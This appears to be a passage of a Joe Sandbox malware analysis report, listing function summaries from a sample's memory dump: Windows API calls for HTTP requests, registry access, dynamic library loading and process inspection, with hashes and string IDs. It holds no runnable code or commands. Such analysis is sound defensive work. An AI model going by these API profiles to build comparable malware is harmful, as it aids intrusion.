                                                                                                                  • Instruction Fuzzy Hash: 73914B746083029FCB10DF24D485E6ABBE5EF89714F14886EF88A9B351DB31E945CB72
                                                                                                                  APIs
                                                                                                                  • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00DB10B8
                                                                                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00DB10EE
                                                                                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00DB10FF
                                                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00DB1181
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                  • String ID: DllGetClassObject
                                                                                                                  • API String ID: 753597075-1075368562
                                                                                                                  • Opcode ID: 0fb04e8c26d23f3d222fefcff666a02fcb1b37d8fe48a9144db7db36a2e1430b
                                                                                                                  • Instruction ID: 749b95eb3c8605d6d46774581042666a6563b07d73a4219f6a017eca2cbb42ee
                                                                                                                  • Opcode Fuzzy Hash: 0fb04e8c26d23f3d222fefcff666a02fcb1b37d8fe48a9144db7db36a2e1430b
                                                                                                                  • Instruction Fuzzy Hash: 534159B5600304EFDB05CF58CC95AAA7BAAEF44394F5480A9EA0ADF205D7B1D944CBB0
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00DB5A93
                                                                                                                  • GetMenuItemInfoW.USER32 ref: 00DB5AAF
                                                                                                                  • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00DB5AF5
                                                                                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00E318F0,00000000), ref: 00DB5B3E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$Delete$InfoItem_memset
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 1173514356-4108050209
                                                                                                                  • Opcode ID: bb313ddbdbbee1165930b9cd70a326b8fdb1fd6cb3dd5521ab00c1b88548cb34
                                                                                                                  • Instruction ID: c409b21e59d900a86e5c0bd46b07d9e94e5b1b4e34009788efb2ff64cb5eb27c
                                                                                                                  • Opcode Fuzzy Hash: bb313ddbdbbee1165930b9cd70a326b8fdb1fd6cb3dd5521ab00c1b88548cb34
                                                                                                                  • Instruction Fuzzy Hash: E3418E71204701EFDB109F24E884FAABBE5EF89314F08465DF9A69B2D5D770A800CB76
                                                                                                                  APIs
                                                                                                                  • CharLowerBuffW.USER32(?,?,?,?), ref: 00DD0478
                                                                                                                    • Part of subcall function 00D77F40: _memmove.LIBCMT ref: 00D77F8F
                                                                                                                    • Part of subcall function 00D7A2FB: _memmove.LIBCMT ref: 00D7A33D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove$BuffCharLower
                                                                                                                  • String ID: cdecl$none$stdcall$winapi
                                                                                                                  • API String ID: 2411302734-567219261
                                                                                                                  • Opcode ID: 50934d7425593a764389bd829fcfefea6467d693afded6fbc9561936124d726c
                                                                                                                  • Instruction ID: 62ab210d58f765c28ddb42bd56da33eb958cc7a2cea6424748fd4fb792587670
                                                                                                                  • Opcode Fuzzy Hash: 50934d7425593a764389bd829fcfefea6467d693afded6fbc9561936124d726c
                                                                                                                  • Instruction Fuzzy Hash: 2531907050061AABCF00EF58D841AEEB7B5FF54310F148A2AE866A72D5DB71E905CF70
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00DAC684
                                                                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00DAC697
                                                                                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 00DAC6C7
                                                                                                                    • Part of subcall function 00D77E53: _memmove.LIBCMT ref: 00D77EB9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$_memmove
                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                  • API String ID: 458670788-1403004172
                                                                                                                  • Opcode ID: a9bacc31a18de1c97f6081270b3626d661c4281db77e43e5c2f5ced838253859
                                                                                                                  • Instruction ID: 677bc35dc8c4ad376eeea485d2df9543d4cc7dc2d32afff00946ed13535e46b2
                                                                                                                  • Opcode Fuzzy Hash: a9bacc31a18de1c97f6081270b3626d661c4281db77e43e5c2f5ced838253859
                                                                                                                  • Instruction Fuzzy Hash: 2C21F371900208BEDB04EB64DC86DFFBBA9DF16320B189519F426E71E0DB744D0A9770
                                                                                                                  APIs
                                                                                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DC4A60
                                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DC4A86
                                                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00DC4AB6
                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00DC4AFD
                                                                                                                    • Part of subcall function 00DC56A9: GetLastError.KERNEL32(?,?,00DC4A2B,00000000,00000000,00000001), ref: 00DC56BE
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1951874230-3916222277
                                                                                                                  • Opcode ID: d41658aa47f0460c3f9c70ef8be067c90c29c574082d84db2066589efaedafc5
                                                                                                                  • Instruction ID: ec5e0bd4d3126cce17bbc9eb94f3739b43624cef6ce5e09bf66c9d7ff6d5e392
                                                                                                                  • Opcode Fuzzy Hash: d41658aa47f0460c3f9c70ef8be067c90c29c574082d84db2066589efaedafc5
                                                                                                                  • Instruction Fuzzy Hash: 0821ACB5540209BEEB11DF649C94FBBB6ADEB88748F10401EF106D7240EA609D059775
                                                                                                                  APIs
                                                                                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00DE454E
                                                                                                                    • Part of subcall function 00D77E53: _memmove.LIBCMT ref: 00D77EB9
                                                                                                                  • _memset.LIBCMT ref: 00D73965
                                                                                                                  • _wcscpy.LIBCMT ref: 00D739B5
                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D739C6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                  • String ID: Line:
                                                                                                                  • API String ID: 3942752672-1585850449
                                                                                                                  • Opcode ID: e48d1a5c0c2acb10e11bfac10c38cd7fcaf0aea85d0d5512b13b7756e1b9feb0
                                                                                                                  • Instruction ID: 0aff8fb5ac1a71696fe2b33207969b3a2946d35fd82353cc77216e39b30eb31d
                                                                                                                  • Opcode Fuzzy Hash: e48d1a5c0c2acb10e11bfac10c38cd7fcaf0aea85d0d5512b13b7756e1b9feb0
                                                                                                                  • Instruction Fuzzy Hash: 5E318171508344AFD725EB60DC46BDA7BE8EB54310F04851EF289921A1EB70AB48DFB2
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00D8C657
                                                                                                                    • Part of subcall function 00D8C619: GetStockObject.GDI32(00000011), ref: 00D8C66B
                                                                                                                    • Part of subcall function 00D8C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D8C675
                                                                                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00DD8F69
                                                                                                                  • LoadLibraryW.KERNEL32(?), ref: 00DD8F70
                                                                                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00DD8F85
                                                                                                                  • DestroyWindow.USER32(?), ref: 00DD8F8D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                  • String ID: SysAnimate32
                                                                                                                  • API String ID: 4146253029-1011021900
                                                                                                                  • Opcode ID: 81ae14ee2b62376312ce752f1061b9652500500e00a518907114609a76ed3143
                                                                                                                  • Instruction ID: 0f34b37c7a2990344aaff04cf7d170dfa31e9fee87be21d7bc1bb5d2f1cbb50a
                                                                                                                  • Opcode Fuzzy Hash: 81ae14ee2b62376312ce752f1061b9652500500e00a518907114609a76ed3143
                                                                                                                  • Instruction Fuzzy Hash: 20216871200209AFEB126F74DC45EBB77AAEF49324F14462AFA54A7290CB71DC50A770
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00DBE392
                                                                                                                  • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 00DBE3E6
                                                                                                                  • __swprintf.LIBCMT ref: 00DBE3FF
                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000,00E0DBF0), ref: 00DBE43D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                  • String ID: %lu
                                                                                                                  • API String ID: 3164766367-685833217
                                                                                                                  • Opcode ID: dc8105f0bc7c8ac8ad44cf8d9fc81eddd720b9391458fbf200cd6353da97bbb0
                                                                                                                  • Instruction ID: 6f0d08af8609f9c900a1626ac2ae8cb8bc2ca68b6fd85b854575a38dcdc41bb7
                                                                                                                  • Opcode Fuzzy Hash: dc8105f0bc7c8ac8ad44cf8d9fc81eddd720b9391458fbf200cd6353da97bbb0
                                                                                                                  • Instruction Fuzzy Hash: F2213D35A40208AFCB10EFA4C885DEE7BB9EF99715B108069F509EB252E671DA05CB71
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D77E53: _memmove.LIBCMT ref: 00D77EB9
                                                                                                                    • Part of subcall function 00DAD623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00DAD640
                                                                                                                    • Part of subcall function 00DAD623: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DAD653
                                                                                                                    • Part of subcall function 00DAD623: GetCurrentThreadId.KERNEL32 ref: 00DAD65A
                                                                                                                    • Part of subcall function 00DAD623: AttachThreadInput.USER32(00000000), ref: 00DAD661
                                                                                                                  • GetFocus.USER32 ref: 00DAD7FB
                                                                                                                    • Part of subcall function 00DAD66C: GetParent.USER32(?), ref: 00DAD67A
                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00DAD844
                                                                                                                  • EnumChildWindows.USER32(?,00DAD8BA), ref: 00DAD86C
                                                                                                                  • __swprintf.LIBCMT ref: 00DAD886
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                  • String ID: %s%d
                                                                                                                  • API String ID: 1941087503-1110647743
                                                                                                                  • Opcode ID: 336c4ff2ce81c65aa4a196bef5b9bf2575e602e24dc8589cdfab4c47b359d8d0
                                                                                                                  • Instruction ID: aad570dc2775cb172aec87409710126cb5aa529b6d4d752aebe738d59d4a76c7
                                                                                                                  • Opcode Fuzzy Hash: 336c4ff2ce81c65aa4a196bef5b9bf2575e602e24dc8589cdfab4c47b359d8d0
                                                                                                                  • Instruction Fuzzy Hash: C91181715002096BDF11BFA09C86FEE376AEB45704F0480B9BE0EAA186DBB49945DB71
                                                                                                                  APIs
                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00DD18E4
                                                                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00DD1917
                                                                                                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00DD1A3A
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00DD1AB0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2364364464-0
                                                                                                                  • Opcode ID: b940bf90fea1b4daec70e178f7490e5ad94b670d4199c884c5297ec5ed0e4e77
                                                                                                                  • Instruction ID: b698804ddb96fc54059147c15fa3c7da7f2c2160b35ebbc18d58f8a20bcb0d98
                                                                                                                  • Opcode Fuzzy Hash: b940bf90fea1b4daec70e178f7490e5ad94b670d4199c884c5297ec5ed0e4e77
                                                                                                                  • Instruction Fuzzy Hash: D4815274A50215BFDB10EF64C886BAD7BE9EF44720F188059F905AF382D7B4E9458BB0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D784A6: __swprintf.LIBCMT ref: 00D784E5
                                                                                                                    • Part of subcall function 00D784A6: __itow.LIBCMT ref: 00D78519
                                                                                                                  • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00DD05DF
                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00DD066E
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00DD068C
                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00DD06D2
                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000004), ref: 00DD06EC
                                                                                                                    • Part of subcall function 00D8F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00DBAEA5,?,?,00000000,00000008), ref: 00D8F282
                                                                                                                    • Part of subcall function 00D8F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00DBAEA5,?,?,00000000,00000008), ref: 00D8F2A6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 327935632-0
                                                                                                                  • Opcode ID: 915442809315bf8aa93f5eae7d29233e6f2bf7677317d7703a2ba10530957db5
                                                                                                                  • Instruction ID: 06675c6fe1a4b511ae8aa7a09c5a3227a4e7fcd8181e6e55e13900f33b02de76
                                                                                                                  • Opcode Fuzzy Hash: 915442809315bf8aa93f5eae7d29233e6f2bf7677317d7703a2ba10530957db5
                                                                                                                  • Instruction Fuzzy Hash: 38511A75A002059FCB00EFA8C495AADBBB5EF88310F14C056E959AB351EB70ED55CB71
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                    • Part of subcall function 00DD3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DD2AA6,?,?), ref: 00DD3B0E
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DD2DE0
                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DD2E1F
                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00DD2E66
                                                                                                                  • RegCloseKey.ADVAPI32(?,?), ref: 00DD2E92
                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00DD2E9F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3440857362-0
                                                                                                                  • Opcode ID: 6732473a8d6f82e6f0b87a84f2743c807781cca0b9d14ab436d0618fdedaa2a4
                                                                                                                  • Instruction ID: dce1bb817a71e08c0b0151733a9375ad3afbcd7d188beab356cafa2c0172aec3
                                                                                                                  • Opcode Fuzzy Hash: 6732473a8d6f82e6f0b87a84f2743c807781cca0b9d14ab436d0618fdedaa2a4
                                                                                                                  • Instruction Fuzzy Hash: 60514A71218305AFC704EF64C881E6AB7E9FF98314F14891EF596872A1EB71E905CB72
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
